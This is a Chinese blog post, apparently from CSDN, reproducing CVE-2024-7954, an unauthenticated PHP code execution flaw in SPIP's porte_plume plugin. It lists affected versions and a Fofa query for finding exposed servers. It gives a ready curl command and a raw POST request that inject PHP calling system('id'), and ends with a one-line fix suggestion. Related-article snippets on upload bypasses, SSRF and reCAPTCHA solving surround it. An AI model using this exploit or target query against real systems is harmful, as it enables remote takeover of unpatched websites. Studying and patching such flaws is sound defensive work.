SPIP插件porte_plume PHP任意执行漏洞(CVE-2024-7954)

已于 2024-08-28 18:35:23 修改
阅读量200 收藏
点赞数 5
分类专栏: 漏洞复现 文章标签: php web安全
于 2024-08-28 15:57:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141642654
版权

0x01 漏洞描述:

SPIP 4.30-alpha2、4.2.13、4.1.16之前的版本使用的porte_plume插件存在任意代码执行漏洞,远程未经身份验证的攻击者可以通过发送精心设计的HTTP 请求以SPIP用户身份执行任意PHP代码。

0x02 影响版本:

SPIP 4.30-alpha2 < 4.2.13

SPIP 4.30-alpha2 < 4.1.16

0x03 搜索语句:

Fofa:icon_hash=="-1224668706"

0x04 漏洞复现:

exp如下:

curl -sSkiL 'https://your-ip/index.php?action=porte_plume_previsu' -X POST -d 'data=AA_[<img111111>->URL`<?php system("id");?>`]_BB'

构造请求如下:

POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Content-Type: application/x-www-form-urlencoded

data=AA_[<img2>->URL`<?php system("id");?>`]_BB

0x05 修复建议:

关闭互联网暴露面或接口设置访问权限

iSee857
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pronto Intervento Apertura Porte-crx插件
04-03
语言:English 打开锁和修复端口ARMORATE 我们重新启动,打开和替换任何类型的锁定或路由。 安装安全锁。 致电我们修理或更换装甲门。 我们介入任何品牌和类型。 如果滚动百叶窗和百叶窗或立即锁定呼叫。...
se2a4_s8_tp_cnp_porte_derobee
03-28
【标题】"se2a4_s8_tp_cnp_porte_derobee" 是一个与VHDL编程相关的项目或实验,可能属于电子工程或计算机科学的学习范畴。在VHDL(Very High-Speed Integrated Circuit Hardware Description Language)中,设计者用...
PIC单片机应用开发典型模块-第四章程序.doc
11-21
`INTPORT`子程序中,通过清除`STATUS`寄存器的某些位来配置工作模式,如清除第0、1和5位,然后清零`PORTC`和`PORTD`,设置`PORTE`的第1位为1,使得RE1为输出。同时,`TRISD`和`TRISC`寄存器被写入特定值,定义了数据...
XMega-A1-XPlored
05-17
XMega-A1-XPlored 我通过向...建筑学LED钩在硬件中的PORTE中,但不应直接通过PORTE进行访问,而应考虑使用LEDPORT宏。 轻跑者“跑马灯”的计时器是PORTC上的第一个TimerCounter(TC0)。 港口别针周边设备描述C 0 计时
Mon Swap-crx插件
03-24
普林西比(Principe):应用连接24h / 24和7j / 7 au porte-clefs交换。 GPS搬运工les的辅助处置申请书仍在继续。 行使自给自足权后,您将享有自理和自给自足的权利。 可以个性化的形式,例如门禁,夹扣和手镯,都...
抽奖系统PHP源码开源二开版带完整后台
最新发布
jiyc2008的博客
08-28 106
抽奖系统源码是一个以php MySQL进行开发的手机抽奖系统源码。用途:适合做推广营销、直播、粉丝抽奖。1、后台可以设置每个抽奖用户的抽奖次数,后台添加设置奖品,适和企业和商场搞活动,后台添加用户,才能抽奖。经过电脑管家、网站安全狗扫描特征码,没有发现可疑文件,请放心使用。该程序可以作为活动氛围活动气氛的烘托作用,活动游戏而已!3、后台可以设置每个奖品的中奖概率,中奖概率采用百分制。2、后台可以添加上传抽奖商品图片和奖品名称。测试环境:php5.6 Mysql。4、会员前台可以查询中奖记录。
upload-labs(Pass-18 ~ Pass-21)
m0_64849639的博客
08-23 958
所以我们只要上传的文件后缀不是白名单中的,该文件就还是会被删除2、思路:由于该文件后缀不是白名单中的,该文件就还是会被删除;但是,服务器删除该php文件是有一定的延迟的,若我们在这延迟中访问了该php代码,那么就会在当前目录生成shell.php文件3、实践:(1)、抓包进入爆破模块:(2)发包:此时就在源源不断的上传文件1.php,服务器也在一直删除该文件;
第三章 封装与继承
weixin_65279640的博客
08-28 831
面向对象三大特征之一 ——封装概念:将类的某些信息隐藏在类内部,不允许外部程序直接访问,而是通过该类提供的方法来实现对隐藏信息的操作和访问把尽可能多的东西藏起来,对外提供便捷的接口。说白了就是把对象中的属性信息封装在对象类内部,不让用户直接使用类属性进行访问,而是定义一个方法作为类属性的接口提供给用户访问使用。封装的两个大致原则把所有的属性藏起来把尽可能多的东西藏起来,对外提供便捷的接口。
Upload-Lab第20关:如何利用文件名可控漏洞
didiplus
08-27 235
在Upload-Lab的第20关中,系统没有对上传文件的内容进行验证,而是仅对用户输入的文件名进行了检查。具体来说,系统使用文件后缀名的黑名单进行过滤,但由于上传的文件名是用户可控的,这为绕过机制提供了可能性。此外,函数还有一个特性,即它会忽略文件名末尾的/.,这可以被利用来绕过后缀名的黑名单检查,从而上传恶意文件。通过这一关的学习,我们可以深入理解 Apache 配置文件的作用及其在安全防护中的重要性。同时,这也提醒我们在设计和开发上传功能时,必须考虑到所有可能的攻击面,确保服务器配置的安全性和稳健性。
使用 Puppeteer 在 PHP 中解决 reCAPTCHA 以进行网页抓取
weixin_68994939的博客
08-28 732
为了让您了解一些背景信息,reCAPTCHA 是一种旨在保护网站免遭自动化滥用的系统。它要求用户完成对人类来说很容易但对机器人来说很困难的任务,例如识别图像中的物体或选中一个框。虽然这些挑战对于安全来说非常有用,但它们对于网页抓取来说却很麻烦。:此版本以“我不是机器人”复选框和基于图像的挑战而闻名。用户可能需要点击图像或完成特定操作来证明他们不是机器人。它在区分真实用户和机器人方面非常有效。:此版本在后台运行。它不直接要求用户交互,而是分析用户在整个网站上的行为,并分配一个风险评分。
畅捷通CRM newleadset.php SQL注入漏洞复现
0xSec
08-26 406
用友畅捷CRM newleadset.php 处存在SQL注入漏洞 ,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
TP6开发文档概述
l4120228的博客
08-27 315
TP6(ThinkPHP 6)是一个使用PHP语言开发的快速、兼容且简单的面向对象开发框架。
网安面试过程中的近源攻击
liguangyao213的博客
08-27 709
吉祥知识星球《网安面试指南》《Java代码审计》《Web安全》《应急响应》《护网资料库》
宝塔安装yasd 远程调试 swoole
刘登辉的博客
08-28 177
完美解决swoole不能用xdebug调试的问题
PHP伪协议
m0_71864767的博客
08-28 217
PHP伪协议(pseudo-protocol)是一种在PHP中用作文件访问的特殊机制。它允许通过“伪协议”指定一个处理方式来处理特定的文件或数据。
wp-autopost-pro 3.7.8最新完美版
jiyc2008的博客
08-25 222
插件是wp-autopost-pro 3.7.8最新版本。采集插件适用对象1、刚建的wordpress站点内容比较少,希望尽快有比较丰富的内容;2、热点内容自动采集并自动发布;3、定时采集,手动采集发布或保存到草稿;4、css样式规则,能更精确的采集需要的内容。5、伪原创与翻译、代理IP进行采集、保存Cookie记录;6、可采集内容到自定义栏目代码下载。
bypass disable_function绕过
banliyaoguai的博客
08-27 946
php-fpm下的php.ini配置文件中有这个么个字段disable_function,在这个字段中disable_function里面你想要禁用那个命令就把命令写在这里,上面写了system,system就被禁用了,修改完配置文件不要忘记重启服务test.php的文件内容访问test.php的没有反应,这就是system被禁止掉了,已经测试过了在项目中各种函数都可能被禁用(会有一部分项目需要的函数被放通),所以当我们拿webshell缺无法执行命令,下面我们来看一下如何绕过。
SSRF漏洞——pikachu
m0_65858385的博客
08-24 921
综上,SSRF的危害极大,我们在进行代码审计的时候尤其需要注意是否存在file_get_contents()、fsockopen()、curl_exec()、fopen()、readfile()这些函数,这些函数是造成SSRF漏洞的成因之一。而我们预防SSRF漏洞可以从以下三点进行防御:1、限制请求的端口只能为Web端口,只允许访问HTTP和HTTPS的请求。2、限制不能访问内网的IP,以防止对内网进行攻击。3、屏蔽返回的详细信息。
多线程资源占用问题
weixin_50600749的博客
08-27 147
数据库资源: 多线程并发访问和修改同一数据库记录(缺乏事务控制或锁定机制),多个线程或进程使用数据库连接资源时,可能导致连接超时或连接耗尽。·网络资源:同时范文或操作同一个网络套接字(如发送和接受数据)可能会引发冲突,导致数据包丢失或混乱;内存映射文件(内容映射到进程的虚拟地址中)、临时文件缓存(本地副本文件)、内存流(内存中(堆)划一块区域存储临时文件)·内存资源: 多线程同时访问或修改静态(全局)变量时可能引发竞争条件,导致数据不一致出错。对于数据库资源可能存在的高并发访问的场景,应该使用数据库。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值